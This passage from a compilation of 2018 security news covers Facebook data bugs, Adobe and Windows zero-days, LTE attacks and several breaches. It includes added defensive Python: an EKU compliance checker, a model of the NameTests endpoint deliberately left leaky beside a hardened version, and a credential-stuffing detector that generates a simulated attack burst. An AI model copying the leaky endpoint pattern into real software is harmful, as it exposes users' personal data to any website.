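SERVER_AUTH = "1.3.6.1.5.5.7.3.1"  # id-kp-serverAuth
CLIENT_AUTH = "1.3.6.1.5.5.7.3.2"  # id-kp-clientAuth
EMAIL_PROTECTION = "1.3.6.1.5.5.7.3.4"  # id-kp-emailProtection


def _encode_oid(oid):
    """DER-encode a dotted OID string as an OBJECT IDENTIFIER (tag 0x06)."""
    arcs = [int(a) for a in oid.split(".")]
    body = bytearray([40 * arcs[0] + arcs[1]])  # first two arcs share a byte
    for arc in arcs[2:]:
        chunk = [arc & 0x7F]
        arc >>= 7
        while arc:                  # base-128, high bit set on all but last
            chunk.insert(0, (arc & 0x7F) | 0x80)
            arc >>= 7
        body.extend(chunk)
    return bytes([0x06, len(body)]) + bytes(body)


def encode_eku(oids):
    """DER-encode an ExtKeyUsageSyntax (SEQUENCE OF OID), short-form length."""
    inner = b"".join(_encode_oid(o) for o in oids)
    if len(inner) >= 128:
        raise ValueError("too many purposes for short-form length")
    return bytes([0x30, len(inner)]) + inner


def _decode_oid(body):
    first = body[0]
    arcs = [first // 40, first % 40]
    val = 0
    for b in body[1:]:
        val = (val << 7) | (b & 0x7F)
        if not b & 0x80:
            arcs.append(val)
            val = 0
    return ".".join(str(a) for a in arcs)


def decode_eku(der):
    """Parse a DER ExtKeyUsageSyntax into a list of dotted OID strings."""
    if not der or der[0] != 0x30:
        raise ValueError("not a SEQUENCE")
    length, pos = der[1], 2
    if length & 0x80:               # long-form length
        n = length & 0x7F
        length = int.from_bytes(der[2:2 + n], "big")
        pos = 2 + n
    end = pos + length
    oids = []
    while pos < end:
        if der[pos] != 0x06:
            raise ValueError("expected OBJECT IDENTIFIER")
        ln = der[pos + 1]
        oids.append(_decode_oid(der[pos + 2:pos + 2 + ln]))
        pos += 2 + ln
    return oids


def eku_complies(eku_der):
    """Return (ok, reason) for an intermediate's EKU extension value, or None
    when the certificate carries no EKU extension at all."""
    if eku_der is None:
        return False, "no EKU extension: intermediate is unrestricted"
    oids = set(decode_eku(eku_der))
    if ANY_EKU in oids:
        return False, "EKU contains anyExtendedKeyUsage"
    if SERVER_AUTH in oids and EMAIL_PROTECTION in oids:
        return False, "EKU permits both serverAuth and emailProtection"
    return True, "ok"
```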

Another new requirement is that root certificates must have complied with the Mozilla Root Store Policy from the moment they were created.

“This effectively means that roots in existence prior to 2014 that did not receive BR audits after 2013 are not eligible for inclusion in Mozilla’s program. Roots with documented BR violations may also be excluded from Mozilla’s root store under this policy,” Thayer said.

Mozilla takes digital certificate management very seriously. Last year it announced taking action against Chinese certificate authority WoSign and its subsidiary StartCom as a result of over a dozen incidents. It also targeted Symantec after the company and its partners were involved in several incidents involving misissued TLS certificates, and later raised concerns over DigiCert’s acquisition of Symantec’s CA business.


Facebook Notifies 800,000 Users of Blocking Bug
3.7.2018 securityweek Social

Facebook on Monday started notifying 800,000 users affected by a bug that resulted in blocked individuals getting temporarily unblocked. The social media giant also detailed some new API restrictions designed to better protect user information.

When you block someone on Facebook, you prevent them from seeing your posts, starting conversations on Messenger, or adding you as a friend. However, a Facebook and Messenger bug introduced on May 29 and addressed on June 5 let blocked users see some of the content posted by the individuals who had blocked them.

According to Facebook Chief Privacy Officer Erin Egan, blocked users could not see content shared only with friends, but they may have been shown content shared with “friends of friends.” The blockee may have also been able to contact the blocker via Messenger.

Egan clarified that friend connections were not reinstated as a result of the bug and 83 percent of impacted users had only one blocked person temporarily unblocked. Affected users will see a notification in their account.

New API restrictions and changes

Facebook also announced on Monday additional measures taken following the Cambridge Analytica incident, in which personal data on tens of millions of users was improperly shared with the British political consultancy through an app.

The social media giant previously shared some information on the steps taken to better protect elections and user data, and it has now announced new changes affecting application developers.

Developers have been informed that several APIs have been or will be deprecated, including the Graph API Explorer App, Profile Expression Kit, Trending API, the Signal tool, Trending Topics, Hashtag Voting, Topic Search, Topic Insights, Topic Feed, and Public Figure. The Trending and Topic APIs are part of the Media Solutions toolkit.

Some APIs will be deprecated, in some cases because of low usage, while others will be restricted.

Developers will once again be allowed to search for Facebook pages via the Pages API, but they will need Page Public Content Access permissions, which can only be obtained via the app review process.

As for marketing tools, Facebook announced that the Marketing API can only be used by reviewed apps, and that it’s introducing new app review permissions for the Live Video and Lead Ads Retrieval APIs.


Microsoft revealed that 2 Zero-Days found in March were part of a cyber weapon in an early development stage
3.7.2018 securityaffairs Vulnerability

Security researchers from Microsoft have published technical details of two zero-day vulnerabilities that have been recently discovered after someone uploaded a weaponized PDF file to VirusTotal.

The two issues were addressed with the May 2018 Patch Tuesday updates, before threat actors used them in attacks in the wild.

The first zero-day vulnerability is a remote code execution flaw in Adobe Acrobat and Reader (CVE-2018-4990), the second one is a privilege escalation flaw in Microsoft Windows (CVE-2018-8120).

“The first exploit attacks the Adobe JavaScript engine to run shellcode in the context of that module. The second exploit, which does not affect modern platforms like Windows 10, allows the shellcode to escape Adobe Reader sandbox and run with elevated privileges from Windows kernel memory. ESET provided an analysis of the exploitation routines in the sample PDF.” reads the analysis published by Microsoft.

Microsoft shared the technical details of both flaws only now, after giving users enough time to update their operating systems and Adobe software.

In late March, experts at ESET analyzed a malicious PDF file that was uploaded on VirusTotal and provided it to the Microsoft security team.

The experts flagged the document “as a potential exploit for an unknown Windows kernel vulnerability.”

The analysis conducted by the Microsoft team revealed that the document includes two different zero-day exploits, one for Adobe Acrobat and Reader and one for Microsoft Windows.


According to Microsoft, the weaponized PDF file was in an early development stage: the code used by the attackers appeared to be proof-of-concept code, and the file did not deliver a malicious payload.

“Although the PDF sample was found in VirusTotal, we have not observed actual attacks perpetrated using these exploits. The exploit was in early development stage, given the fact that the PDF itself did not deliver a malicious payload and appeared to be proof-of-concept (PoC) code.” reads the analysis published by Microsoft.

Someone combined the two zero-days to build a very powerful attack vector.

The Adobe Acrobat and Reader exploit is included in the document as a specially crafted JPEG 2000 image that contains the JavaScript exploit code used to trigger a double-free vulnerability in the software to run shellcode.


The attackers were trying to chain this exploit with the second Windows kernel exploit to break the Adobe Reader sandbox and run it with elevated privileges.

Once the attacker has exploited the Adobe Reader vulnerability, he leverages the Windows zero-day flaw to escape the sandbox. The Microsoft Win32k zero-day, which runs in kernel mode, allows the attacker to run the dropped PE file with elevated privileges, escaping the Adobe Acrobat/Reader sandbox and gaining system-level access.

The PoC payload used in the sample dropped an empty vbs file in the Startup folder.

“Initially, ESET researchers discovered the PDF sample when it was uploaded to a public repository of malicious samples. The sample does not contain a final payload, which may suggest that it was caught during its early development stages.” concluded ESET.

“Even though the sample does not contain a real malicious final payload, the author(s) demonstrated a high level of skills in vulnerability discovery and exploit writing.”

Both Microsoft and ESET published technical details of the two zero-days, and both firms also shared the IoCs for the exploits.


NSA began deleting all call detail records (CDRs) acquired since 2015
3.7.2018 securityaffairs BigBrothers

The US National Security Agency announced it is deleting hundreds of millions of records of phone calls and text messages dating back to 2015 due to technical irregularities in some data received from telecommunications service providers.

“Consistent with NSA’s core values of respect for the law, accountability, integrity, and transparency we are making public notice that on May 23, 2018, NSA began deleting all call detail records (CDRs) acquired since 2015 under Title V of the Foreign Intelligence Surveillance Act (FISA)” reads the announcement published by the NSA.

“NSA is deleting the CDRs because several months ago NSA analysts noted technical irregularities in some data received from telecommunications service providers.”

Title V of the Foreign Intelligence Surveillance Act (FISA) and the USA Freedom Act of 2015 allow the intelligence agencies to collect call metadata related to certain types of calls involving persons of interest whose activity may pose a threat to homeland security.

The National Security Agency received more call detail records (CDRs) than it was allowed to retain under the current legal framework.

The NSA decided to destroy the data because it was infeasible to identify and isolate the properly produced records.

“Consequently, NSA, in consultation with the Department of Justice and the Office of the Director of National Intelligence, decided that the appropriate course of action was to delete all CDRs. NSA notified the Congressional Oversight Committees, the Privacy and Civil Liberties Oversight Board, and the Department of Justice of this decision.” continues the announcement.

The National Security Agency started to delete the malformed CDRs on May 23 this year, more than a month ago.


The agency also confirmed that it has addressed the root cause of the problem for future CDR acquisitions.

The National Security Agency reported the problem to the Congressional Oversight Committees, the Privacy and Civil Liberties Oversight Board, and the Department of Justice, which in turn notified the Foreign Intelligence Surveillance Court.

This isn’t the first such incident: last year civil liberties journalist Marcy Wheeler published a catalog of all the times the National Security Agency had violated FISA since the Stellar Wind phone dragnet was brought under FISA in 2004.


Researchers Create Attacks That Compromise LTE Data Communication
2.7.2018 securityweek Attack

Newly devised attacks on the Long Term Evolution (LTE) high-speed wireless standard break the confidentiality and privacy of communication, a team of researchers claims.

In a newly published paper (PDF), researchers from Ruhr-University Bochum and New York University Abu Dhabi present a set of attacks against LTE’s data link layer (layer two) protocols, which could be used to identify mobile users within a cell, learn what websites the user visits, and even modify the message payload.

A stealthy attacker, the researchers say, could perform an identity mapping attack and map the user’s temporary network identity (TMSI) to the temporary radio identity (RNTI). Neither identifier is known to the attacker beforehand, but both are contained in the radio packets.

“More specifically, we demonstrate how an attacker can precisely localize and identify a user within the cell, distinguish multiple transmission streams, and use this information as a stepping stone for subsequent attacks,” the researchers note.

Using common paging techniques, the researchers were also able to identify and localize specific users for a pre-known TMSI within the cell. This, however, requires the use of an active interface, meaning that the attack becomes detectable.

The researchers also demonstrate that, even for encrypted transmissions, plaintext information up to the Packet Data Convergence Protocol (PDCP) can be accessed, thus de-anonymizing connections otherwise considered secure due to encryption.

Targeting Tor with their website fingerprinting attack, the researchers revealed that information leaks in the metadata of a connection could be used to distinguish between different websites. They also demonstrated how website fingerprinting can be mapped to LTE layer two attacks.

Although they achieved a high success rate with such an attack, the researchers explain that the experiments were performed on a closed LTE network completely under their control and on a small set of websites.

In addition to these passive attacks, the researchers devised an active attack on LTE’s layer two protocols. Called ALTER, it “exploits the missing integrity protection of LTE user data to perform a chosen-ciphertext attack,” affects all LTE devices and has implications up to the application layer, the research paper reads.

For this attack scenario, the researchers used a malicious relay within the vicinity of the user, which intercepts DNS requests from the mobile device and uses a manipulation mask to change the original IP address to that of the malicious DNS server.

The request is then forwarded to the commercial network, which sends it to the malicious server, and an additional manipulation in the downlink path ensures that the source IP address matches the target, thus rendering the attack undetected.

The attack, however, poses several challenges, such as luring the user into connecting to the malicious relay and maintaining a stable radio connection, and identifying the DNS requests and responses among the transmitted packets. Packet manipulation is another issue an attacker would face.

After testing the ALTER attack in a real-world setup, the researchers determined it is a feasible assault scenario. By forwarding all messages between the user device and the network, the malicious relay remains undetectable. The attack, the researchers claim, is possible despite the LTE Authentication and Key Agreement (AKA) being formally proven secure.

“While lots of research effort in LTE security focuses on the physical and network layers, the data link layer has remained unexplored until now. […] Based on our findings, we urgently demand the implementation of effective countermeasures in the upcoming 5G specification to assure the security and privacy of future mobile communication,” the paper concludes.


Massive Breach at Data Broker Exactis Exposes Millions of Americans
2.7.2018 securityweek Incident

Security Researcher Vinny Troia has discovered another sensitive database exposed on the internet. This one uses Elasticsearch, which allows easy data searching over the internet. Elasticsearch offers security including authentication and role-based access control -- but not all customers deploy it.

Troia was interested in Elasticsearch security and used Shodan to find U.S. Elasticsearch databases visible on the internet. According to a report in Wired, he found around 7,000. One stood out -- a database owned by Florida-based data broker firm Exactis and containing personal data on both consumers and businesses.

What makes this discovery exceptional was the sheer size of the database, the sensitivity of the content, and the complete lack of security. Precise details are difficult to ascertain, and Exactis has not been forthcoming with details. However, it appears to contain something like 340 million records (230 million on consumers and 110 million on business contacts); making it a far bigger potential breach than last year's Equifax breach.

The Exactis website claims the firm has consumer data on 218 million individuals and 110 million households. Eighty-eight million have email addresses and matching postal addresses, and 112 million include residential phone numbers. Business data includes 21 million companies, 40 million postal addresses, 21 million records with email addresses and matching postal address, and 52 million with business phone numbers.

How much of this was exposed is not known, but it is potentially everything. It doesn't include social security numbers or payment details, but goes into great detail for each individual, including interests, habits and the age and gender of children. It apparently includes more than 400 variables ranging from religion, pets, whether a person smokes, to personal interests.

Troia reported his findings to both Exactis and the FBI; and the database is no longer accessible. However, there is no way of knowing whether anyone other than Troia also located and accessed the data. While Exactis sells this data to businesses to help compile compelling and personalized marketing campaigns, in the hands of cyber criminals the same data could equally be used to compile compelling and personalized phishing campaigns. Any hope that cyber criminals don't use Shodan in the same way and to the same effect as Troia is unfounded.

Robert Capps, VP and Authentication Strategist for NuData Security comments, "If U.S. citizens did not think their personal information has ever been compromised, this should convince them it definitely is. This latest breach blows up the 2018 tab with 230-million records exposed in just one incident."

Chris Olson, CEO of The Media Trust, believes that government must now take a lead. "Data providers need to keep in mind that they are prime targets for cybercriminals who want to commit identity theft and have tools to find databases on publicly accessible servers. While we have yet to find out whether the data they have exposed on a public server has been misappropriated by malicious actors, the scope of and negligence behind this leak could prompt greater demand among already wary U.S. consumers for stronger regulations around data privacy like the EU's GDPR. Such regulations would restrict how personal data is not only stored but used in the U.S."

Carl Wright, chief revenue officer for AttackIQ, holds a similar view. "When a breach such as this occurs, it reinforces the need for government to hold these organizations accountable to the individuals impacted. This will be the only way to ensure that corporations take the necessary steps to secure consumer data. Corporations and government entities must be required to continuously prove that their cyber security protections are able to defeat or detect attackers."

This already happens in Europe with the EU's General Data Protection Regulation (GDPR). It seems to be beginning in the U.S. Yesterday, California Gov. Jerry Brown signed the California Consumer Privacy Act of 2018 (Assembly Bill 375).

"With GDPR now in full effect," comments Richard Henderson, global security strategist at Absolute, "I've been expecting legislation such as this to start to reach consumer-focused states in the US for some time. Other states like New York and Massachusetts will likely follow suit and draft their own citizen-friendly data rights laws. Many individual states will not sit on their hands waiting for a federal initiative that may never come."

The California Act will not come into effect until the beginning of 2020 -- but it will undoubtedly make firms like Exactis re-evaluate what they do, how they do it, and how they secure it. The legislation says, for example, "The bill would require a business to make disclosures about the information and the purposes for which it is used. The bill would grant a consumer the right to request deletion of personal information and would require the business to delete upon receipt of a verified request, as specified."

Meanwhile, 'victims' of the Exactis breach are not waiting for the new law. A proposed class action was lodged in the Florida federal court on Thursday, claiming that Exactis made no attempt to follow best practice guidelines to protect the data. "Despite these well-publicized Senate and other expert reports, defendant failed to heed the recommendations, and inexplicably left its server -- and the personal information which rested thereon -- vulnerable and available to even the most basic cyberattack," claims the suit. It asserts negligence, unjust enrichment claims, and claims under Florida's Deceptive and Unfair Trade Practices Act, and seeks compensatory, punitive, and exemplary damages.

Referring to the California Act, Henderson adds, "I think we are on the threshold of a new period of customer-focused data protections. State and local governments have waited a long time for organizations to take care of this, and based on the colossal number of breaches and rampant digital thefts that continue to occur, they've had enough."


Facebook App Exposed Data of 120 Million Users
2.7.2018 securityweek Social

A recently addressed privacy bug on Nametests.com resulted in the data of over 120 million users who took personality quizzes on Facebook being publicly exposed.

Reported and fixed under Facebook’s Data Abuse Bounty Program, the vulnerability consisted of Nametests.com serving users’ data to any third party that requested it, something that should not normally be possible.

Facebook launched its Data Abuse Bounty Program in April, as part of its efforts to improve user privacy following the Cambridge Analytica scandal. The company also updated its terms on privacy and data sharing, but also admitted to tracking people over the Internet, even those who are not Facebook users.

The issue in Nametests.com was reported by Inti De Ceukelaire, who discovered that, when loading a personality test, the website would fetch all of his personal information from http://nametests.com/appconfig_user and display it on the page.

A third-party website should not normally be able to read this information, because the browser’s same-origin policy stops one site from reading another site’s responses. Nametests.com, however, returned the data wrapped in JavaScript, and any website can load and execute a cross-origin script file, so the data could be read by other websites.

“Since NameTests displayed their user’s personal data in a JavaScript file, virtually any website could access it when they would request it,” the researcher explains.

To verify that this was indeed happening, he set up a website that connected to Nametests.com and would fetch information about the visitor. The access token provided by Nametests.com could also be used to gain access to the visitor’s posts, photos and friends, depending on the permissions granted.

“It would only take one visit to our website to gain access to someone’s personal information for up to two months,” De Ceukelaire says.

Another issue the researcher discovered was that the user information would continue to be exposed even after they deleted the application. With no log out functionality available, users would have had to manually delete the cookies on their devices to prevent their data from being leaked.
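As an added example (not NameTests’ or Facebook’s code, and only a model of the behaviour described above), the following sketches the appconfig_user endpoint in its leaky form, served as a JavaScript file, beside a hardened form with a logout, plus a simulation of what a third-party page that embeds the URL in a script tag ends up with. The session store, the request shape and all function names are assumptions; the HTTP headers used are standard ones.

```python
# Added example, not NameTests' or Facebook's code. Models the appconfig_user
# endpoint described above in its leaky and hardened forms, and what a
# third-party <script src="https://nametests.com/appconfig_user"> load yields.
import json

SITE_ORIGIN = "https://nametests.com"
# Constructed server-side session store: cookie value -> user record.
SESSIONS = {
    "sess-1": {"user_id": 42, "name": "Inti", "fb_token": "CONSTRUCTED-TOKEN"},
}
JS_PREFIX = "window.appConfig = "


def handle_appconfig_user(request, hardened):
    """request = {'cookies': {...}, 'origin': str|None}. Returns a response dict.
    A cross-origin <script> load sends cookies (2018 defaults) but no Origin
    header, so the server cannot tell who is embedding it."""
    sess = SESSIONS.get(request["cookies"].get("sid"))
    if sess is None:
        return {"status": 401, "headers": {}, "body": ""}
    if not hardened:
        # Leaky: personal data is emitted as executable JavaScript, so any page
        # that embeds the URL in a <script> tag runs it inside its own origin
        # and can read window.appConfig, token included.
        return {"status": 200,
                "headers": {"Content-Type": "application/javascript"},
                "body": JS_PREFIX + json.dumps(sess) + ";"}
    # Hardened: reject cross-origin CORS readers explicitly, serve plain JSON
    # (not usable as a script), nosniff so a <script> tag will not execute a
    # non-JavaScript MIME type, and CORP so the browser blocks cross-origin
    # no-cors loads of the resource altogether.
    if request.get("origin") not in (None, SITE_ORIGIN):
        return {"status": 403, "headers": {}, "body": ""}
    headers = {"Content-Type": "application/json",
               "X-Content-Type-Options": "nosniff",
               "Cross-Origin-Resource-Policy": "same-origin",
               "Cache-Control": "no-store"}
    return {"status": 200, "headers": headers, "body": json.dumps(sess)}


def handle_logout(request):
    """Hardened addition: server-side logout, so a user can end the session
    instead of having to delete cookies by hand. Returns True if one ended."""
    return SESSIONS.pop(request["cookies"].get("sid"), None) is not None


def third_party_script_include(response):
    """Model of a cross-origin <script src> load in the embedding page: the
    body runs only if CORP allows the load and the MIME type is JavaScript
    (or sniffable, when nosniff is absent). Returns the object the embedding
    page can read, or None when nothing leaks."""
    if response["status"] != 200:
        return None
    h = response["headers"]
    if h.get("Cross-Origin-Resource-Policy") == "same-origin":
        return None                         # browser blocks the load
    ctype = h.get("Content-Type", "")
    if "javascript" not in ctype and h.get("X-Content-Type-Options") == "nosniff":
        return None                         # script tag refuses to execute
    body = response["body"]
    if body.startswith(JS_PREFIX) and body.endswith(";"):
        return json.loads(body[len(JS_PREFIX):-1])  # assignment ran: leaked
    return None  # a bare JSON object is not a usable script body
```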

The bug was reported to Facebook’s Data Abuse program on April 22 and a fix was rolled out by June 25, when the researcher noticed that third-parties could no longer access visitors’ personal information as before.

The vulnerability could “have affected Facebook information people shared with nametests.com. To be on the safe side, we revoked the access tokens for everyone on Facebook who has signed up to use this app. So people will need to re-authorize the app in order to continue using it,” Facebook said.

The social platform also donated $8,000 (they apparently doubled the $4,000 bounty because the researcher chose to donate it to charity) to the Freedom of the Press foundation.

“I also got a response from NameTests. The public relations team claims that, according to the data and knowledge they have, they found no evidence of abuse by a third party. They also state that they have implemented additional tests to find such bugs and avoid them in the future,” the researcher notes.


Two Arrested for Hacking 700,000 Accounts
2.7.2018 securityweek  Crime

Russian law enforcement this week said two individuals were arrested for compromising accounts of loyalty program members from popular websites.

The unnamed cybercriminals allegedly compromised around 700,000 accounts from companies such as PayPal, Ulmart, Biglion, KupiKupon, Groupon, and others. They are also said to have put 2,000 of these accounts up for sale for $5 each.

“The detainees admitted on the spot that they had earned at least 500,000 rubles. However, the real amount of damage remains to be determined,” Group-IB, which aided with the investigation, says.

The hackers’ activity first drew attention in November 2015, after the website of a large online store was hit by a large-scale cyber-attack in which the personal accounts of the store’s loyalty program members were compromised. The miscreants compromised around 120,000 accounts within a month.

The investigators discovered that the attackers “had collected compromised account information from various Internet services on hacker forums and used special programs to automatically guess passwords of accounts on the website of the online store.”

The miscreants relied on people’s habit of reusing the same login/password on multiple websites. If the logins and passwords were used on the targeted websites, the hackers would access those personal accounts.

The cybercriminals would check the accumulated bonuses on each account and would sell them on hacker forums at $5 per account or 20-30% of the nominal balance of the accounts. The buyers could then abuse the accounts to pay for products with the bonuses.

The hackers, Group-IB says, weren’t only selling compromised accounts, but also offered services for hijacking accounts: they would change the phone number and e-mail on the accounts of the online store. Such services were offered at a price of 10% of the bonus balance on the account.

To hide their tracks, the attackers used anonymizers, launched the attacks from different IP addresses, and also changed the digital fingerprint of the browser (User-Agent). Overall, they sent authorization requests from more than 35,000 unique IP addresses.
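The pattern described above (leaked credential lists replayed once per account, spread over many IP addresses with rotating User-Agents, so per-IP limits never trip) has a recognisable aggregate shape. As an added example (not Group-IB’s or any retailer’s code), the following detector runs over constructed login-log lines; the log format, thresholds and function names are assumptions.

```python
# Added example, not Group-IB's or any retailer's code: flag login windows
# that look like credential stuffing and list the accounts that were hit.
from datetime import datetime, timedelta

EPOCH = datetime(1970, 1, 1)

# Constructed baseline traffic: a few users, retries from the same IP.
BASELINE = [
    "2015-11-03T01:00:05Z 198.51.100.7 carol OK Mozilla/5.0 (X11)",
    "2015-11-03T01:00:40Z 198.51.100.7 carol OK Mozilla/5.0 (X11)",
    "2015-11-03T01:01:10Z 198.51.100.8 dave FAIL Mozilla/5.0 (Win)",
    "2015-11-03T01:01:19Z 198.51.100.8 dave OK Mozilla/5.0 (Win)",
    "2015-11-03T01:02:30Z 198.51.100.9 erin OK Mozilla/5.0 (Mac)",
]


def constructed_burst():
    """Constructed stuffing burst: 40 usernames from a leaked list, each tried
    once from its own IP with a rotating User-Agent; two reused passwords hit."""
    lines = []
    for i in range(40):
        result = "OK" if i in (7, 23) else "FAIL"
        lines.append(f"2015-11-03T02:30:{i:02d}Z 203.0.113.{i + 1} "
                     f"user{i:03d} {result} Bot/{i % 5}")
    return lines


def load_events(lines):
    """Parse 'timestamp ip username result user-agent' lines (assumed format)."""
    events = []
    for line in lines:
        ts, ip, user, result, ua = line.split(" ", 4)
        events.append({"ts": datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ"),
                       "ip": ip, "user": user, "ok": result == "OK", "ua": ua})
    return events


def window_start(ts, window):
    """Floor a timestamp to the start of its fixed-size window."""
    return EPOCH + ((ts - EPOCH) // window) * window


def detect_stuffing(events, window=timedelta(minutes=5), min_attempts=20,
                    min_fail_ratio=0.8, min_user_spread=0.8, min_ip_spread=0.5):
    """Flag windows where almost every attempt targets a different account,
    comes from a different IP, and fails. Each IP stays under any per-IP
    rate limit, but the aggregate shape is unlike normal logins."""
    buckets = {}
    for ev in events:
        buckets.setdefault(window_start(ev["ts"], window), []).append(ev)
    flagged = []
    for start, evs in sorted(buckets.items()):
        attempts = len(evs)
        if attempts < min_attempts:
            continue
        stats = {
            "window_start": start,
            "attempts": attempts,
            "failures": sum(not e["ok"] for e in evs),
            "distinct_users": len({e["user"] for e in evs}),
            "distinct_ips": len({e["ip"] for e in evs}),
            "distinct_uas": len({e["ua"] for e in evs}),
        }
        if (stats["failures"] / attempts >= min_fail_ratio
                and stats["distinct_users"] / attempts >= min_user_spread
                and stats["distinct_ips"] / attempts >= min_ip_spread):
            flagged.append(stats)
    return flagged


def accounts_at_risk(events, flagged, window=timedelta(minutes=5)):
    """Accounts that logged in successfully inside a flagged window: candidates
    for a forced password reset and a hold on bonus-funded orders."""
    starts = {f["window_start"] for f in flagged}
    return {e["user"] for e in events
            if e["ok"] and window_start(e["ts"], window) in starts}
```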

Large retailers started checking all orders paid with bonuses in early 2016, which prompted the hackers to target lesser-known online stores.

“In addition, the hackers began to work on tips—information about new online stores with bonus programs and coupon services where it was possible to access personal accounts, for which the attackers promised to pay up to 50% of the amount received from the further sale of the compromised accounts,” Group-IB reports.

The leader in these attacks was a resident of Ryazan Region, born in 1998. His partner, born in 1997, who provided technical support for their joint online store, resided in Astrakhan Region.

During a search, investigators seized evidence of the group’s unlawful activities, along with narcotics. The suspects have confessed to the crimes but the investigation is still ongoing.


Typeform Data Breach Hits Many Organizations
2.7.2018 securityweek Incident

Typeform, a Spain-based software-as-a-service (SaaS) company that specializes in online forms and surveys, has suffered a security breach that resulted in the data collected by its customers getting stolen.

According to a notice posted on its website, Typeform identified the breach on June 27 and addressed its cause roughly half an hour later. The company says an attacker has managed to download a backup file dated May 3 from one of its servers.

The compromised file stored names, email addresses and other pieces of information submitted by users through Typeform forms. Data collected after May 3, payment information, and passwords are not impacted, Typeform said.

UK-based mobile banking service Monzo is one of the impacted organizations. Monzo says the breach affects roughly 20,000 individuals, the vast majority of whom only had their email address exposed. However, in some cases, information such as postcode, name of the old bank, Twitter username, university, city, age and salary range, and employer was also compromised. Monzo says it has ended its relationship with Typeform following the incident.

The Tasmanian Electoral Commission was also hit by this breach. The organization notes that while some of the stolen data is already public, the attacker may have also obtained names, addresses, email addresses, and dates of birth submitted by electors when applying for an express vote at recent elections.

The list of organizations that have notified customers of the Typeform breach also includes Thriva, Birdseye, HackUPC, and Ocean Protocol.

Typeform last year claimed to have 30,000 paying customers and many more using its free service. Companies such as Apple, Uber, Facebook, Adobe, Airbnb, WeTransfer and BBC are also said to have used its services at some point. The company’s website currently lists Trello, HubSpot, Indiegogo, Forbes, and Freshdesk as customers.

Typeform has assured customers that it has identified and addressed the source of the breach. The company claims it has initiated a comprehensive review of its system security and is taking “significant measures” to prevent such incidents from occurring in the future.

However, shortly after the data breach was disclosed, one Twitter user claimed to have identified another vulnerability in Typeform systems.


Vulnerabilities Patched in VMware ESXi, Workstation, Fusion
2.7.2018 securityweek Vulnerability

VMware informed customers last week that it patched several vulnerabilities that can lead to a denial-of-service (DoS) condition or information disclosure in its ESXi, Workstation, and Fusion products.

VMware described the flaws as out-of-bounds read issues in the shader translator component. An attacker with regular user privileges can exploit the security holes to obtain information or crash virtual machines.

The vulnerabilities, classified as “important,” are tracked as CVE-2018-6965, CVE-2018-6966 and CVE-2018-6967. A Tencent ZhanluLab researcher who uses the online moniker “RanchoIce” has been credited for reporting the flaws to VMware. A researcher from Cisco Talos independently discovered CVE-2018-6965.

According to VMware, the flaws impact ESXi 6.7 and Workstation 14.x running on any platform, and Fusion 10.x running on OS X. Patches and updates have been released for each of the affected products.

Cisco Talos has published an advisory containing technical details for CVE-2018-6965. The company has assigned a CVSS score of 6.5 to this vulnerability, which puts it near the “high severity” range.

“A specially crafted pixel shader can cause a read access violation resulting in, at least, denial of service. An attacker can provide a specially crafted shader file (either in binary or text form) to trigger this vulnerability. This vulnerability can be triggered from VMware guest and VMware host, which will be affected (leading to vmware-vmx.exe process crash on host),” Talos wrote in its advisory.

“In short, it is possible to create a shader in such a way that it will cause invalid pointer calculation. The pointer is later used for read memory operations. This causes access violation due to the pointer being invalid, which results in a denial of service, but could potentially be turned into an information disclosure vulnerability,” Talos added.


Trezor users targeted by phishing attacks, experts blame DNS Poisoning or BGP Hijacking
2.7.2018 securityaffairs
Phishing

The maintainers of the Trezor multi-cryptocurrency wallet service reported a phishing attack against some of its users that occurred during the weekend.

TREZOR

@TREZOR
· 1 Jul
Replying to @TREZOR
More details will be published soon in the form of a blog post.

Carsten
@Carsten71071425
I had some issues yesterday, when accessing your site. It seems to be related with DNS. Is http://beta-wallet.trezor.io legit?

1:13 PM - Jul 1, 2018
The attack appears more complex than a simple phishing campaign: the attackers may have carried out a DNS poisoning attack or a BGP hijacking to redirect users to a rogue phishing site that mimics the legitimate one.

“The signs point toward DNS poisoning or BGP hijacking,” explains the Trezor team.

Hackers redirected legitimate traffic for the official wallet.trezor.io domain to a rogue copy of the website.

The team launched an investigation to shed light on the attack. The incident was spotted after users reported HTTPS certificate errors when landing on the web wallet portal.

The error alerted users: a certificate warning of this kind suggests the visitor has landed on a rogue website posing as the legitimate one.

Users quickly reported the anomaly to the maintainers, who confirmed the phishing attack and published a security advisory to warn users.

“Late night yesterday, our Support Team started receiving inquiries about an invalid SSL certificate, which serves as a stamp of authenticity of our web services. This can happen for a few reasons, some of which are less serious. Unfortunately, after investigating these reports closer, we found out that the invalid certificate warning appeared because of phishing attempts against Trezor users.” reads the security advisory.

“The fake Trezor Wallet website was served to some users who attempted to access wallet.trezor.io — the legitimate address. We do not yet know which attack vector was used, but the signs point toward DNS poisoning or BGP hijacking.”

The company also reported two other issues for the bogus website:

The first issue was an error message that differed from the one on the original Trezor site, telling users that syncing data between their Trezor hardware wallet and their Trezor web account had failed.
Trezor error message

The second issue was that the fake website asked users to provide a copy of their “recovery seed”. Trezor warns that users should never enter the recovery seed on a PC or in an app: if the attackers obtain the recovery seed, they can take over the accounts.
The company took down the malicious website with the support of the hosting provider.

slush
@slushcz
"At this moment, the fake Wallet has been taken down by the hosting provider. However, you should remain vigilant and report all suspicious sites. It is possible that this attack method will be used repeatedly in the future."https://blog.trezor.io/psa-phishing-alert-fake-trezor-wallet-website-3bcfdfc3eced …

5:43 PM - Jul 1, 2018

At the time of writing it is not clear whether the attackers stole any user funds.

Let’s close with suggestions provided by the company:

So how should I recognize the original Trezor Wallet?
Look for the “Secure” sign in your browser’s address bar. If the certificate is invalid, your browser will warn you, and you should heed the warning. (Make sure you are accessing the correct URL: wallet.trezor.io)
Always verify all operations on your Trezor device. You should only trust the device display and what is written on it. For other sources of information, always maintain a healthy amount of skepticism.
Thirdly, never divulge sensitive or private data to anyone. This includes us at SatoshiLabs. We will never ask you for your recovery seed. Wallet will never ask you for your recovery seed. Only your device may, but it will do so securely.


A sample of CryptoCurrency Clipboard Hijackers monitors 2.3 Million Bitcoin addresses
2.7.2018 securityaffairs Cryptocurrency

A sample of CryptoCurrency Clipboard Hijackers discovered this week by BleepingComputer monitors for more than 2.3 million addresses.
Almost everyone who sends cryptocurrency copies the recipient’s wallet address from one application and pastes it into another to make the transaction.

Crooks’ interest in cryptocurrency continues to grow, and new malware has been specifically designed to recognize wallet addresses in the memory of infected computers and abuse them for fraud, such as the hijacking of transactions.

